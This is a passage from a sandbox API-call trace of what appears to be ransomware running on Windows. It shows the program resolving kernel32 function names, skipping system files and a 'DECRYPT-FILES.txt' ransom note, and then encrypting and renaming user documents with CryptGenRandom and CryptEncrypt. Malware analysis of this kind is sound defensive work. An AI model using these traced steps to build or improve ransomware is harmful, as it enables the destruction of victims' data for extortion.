out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.732] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.733] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.733] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.733] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.733] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.733] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.733] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.733] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.733] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.733] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.733] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.733] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.733] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.733] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.733] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.733] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.733] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.733] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.733] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.734] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.734] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.734] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.734] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.734] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.734] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.734] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.734] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.734] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.734] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.734] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.734] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.734] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.734] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.734] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.734] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.734] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.734] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.734] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.735] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.735] lstrlenA (lpString="DELETEATOM") returned 10 [0083.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.735] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.735] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.735] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.735] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.735] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.735] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.735] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.735] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.735] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.735] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.735] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.735] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.735] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.735] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.735] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.735] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.736] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.736] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.736] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.736] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.736] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.736] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.736] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.736] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.736] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.736] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.736] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.736] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.736] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.736] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.736] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.736] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.736] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.736] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.736] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.737] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.737] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.737] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.737] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.737] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.737] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.737] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.737] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.737] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.737] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.737] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.737] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.738] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0Vab-9jdPOdBqrE6M.pptx") returned 62 [0083.738] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0Vab-9jdPOdBqrE6M.pptx.xepV") returned 67 [0083.738] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0Vab-9jdPOdBqrE6M.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0vab-9jdpodbqre6m.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0Vab-9jdPOdBqrE6M.pptx.xepV" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0vab-9jdpodbqre6m.pptx.xepv"), dwFlags=0x0) returned 1 [0083.738] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.738] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.739] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.739] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43875970, ftCreationTime.dwHighDateTime=0x1d5461c, ftLastAccessTime.dwLowDateTime=0x8d2a4010, ftLastAccessTime.dwHighDateTime=0x1d5221d, ftLastWriteTime.dwLowDateTime=0x8d2a4010, ftLastWriteTime.dwHighDateTime=0x1d5221d, nFileSizeHigh=0x0, nFileSizeLow=0x16232, dwReserved0=0x0, dwReserved1=0x0, cFileName="5zUARQ_fQofL.xlsx", cAlternateFileName="5ZUARQ~1.XLS")) returned 1 [0083.739] lstrcmpiW (lpString1="5zUARQ_fQofL.xlsx", lpString2="DECRYPT-FILES.txt") returned -1 [0083.739] lstrcmpiW (lpString1="5zUARQ_fQofL.xlsx", lpString2="autorun.inf") returned -1 [0083.739] lstrcmpiW (lpString1="5zUARQ_fQofL.xlsx", lpString2="boot.ini") returned -1 [0083.739] lstrcmpiW (lpString1="5zUARQ_fQofL.xlsx", lpString2="desktop.ini") returned -1 [0083.739] lstrcmpiW (lpString1="5zUARQ_fQofL.xlsx", lpString2="ntuser.dat") returned -1 [0083.739] lstrcmpiW (lpString1="5zUARQ_fQofL.xlsx", lpString2="iconcache.db") returned -1 [0083.739] lstrcmpiW (lpString1="5zUARQ_fQofL.xlsx", lpString2="bootsect.bak") returned -1 [0083.739] lstrcmpiW (lpString1="5zUARQ_fQofL.xlsx", lpString2="ntuser.dat.log") returned -1 [0083.739] lstrcmpiW (lpString1="5zUARQ_fQofL.xlsx", lpString2="thumbs.db") returned -1 [0083.739] lstrcmpiW (lpString1="5zUARQ_fQofL.xlsx", lpString2="Bootfont.bin") returned -1 [0083.739] lstrlenW (lpString="5zUARQ_fQofL.xlsx") returned 17 [0083.739] lstrcmpiW (lpString1="xlsx", lpString2="lnk") returned 1 [0083.739] lstrcmpiW (lpString1="xlsx", lpString2="exe") returned 1 [0083.739] lstrcmpiW (lpString1="xlsx", lpString2="sys") returned 1 [0083.739] lstrcmpiW (lpString1="xlsx", lpString2="dll") returned 1 [0083.739] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0083.739] lstrlenW (lpString="5zUARQ_fQofL.xlsx") returned 17 [0083.739] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0083.739] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="5zUARQ_fQofL.xlsx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5zUARQ_fQofL.xlsx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5zUARQ_fQofL.xlsx" [0083.739] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.740] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5zUARQ_fQofL.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5zuarq_fqofl.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0083.740] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=90674) returned 1 [0083.740] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0083.740] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0083.740] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0083.740] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0083.740] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.740] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0083.741] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.742] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.742] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0083.743] CloseHandle (hObject=0x414) returned 1 [0083.743] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.743] WriteFile (in: hFile=0x410, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0083.744] CloseHandle (hObject=0x0) returned 0 [0083.744] CloseHandle (hObject=0x410) returned 1 [0083.744] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.744] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.745] GetTickCount () returned 0x114d672 [0083.745] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.745] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.745] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0083.745] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.745] lstrlenA (lpString="kernel32.dll") returned 12 [0083.746] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.746] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.746] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.746] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.746] lstrlenA (lpString="ADDATOMA") returned 8 [0083.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.746] lstrlenA (lpString="ADDATOMW") returned 8 [0083.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.746] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.746] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.746] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.746] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.746] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.746] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: 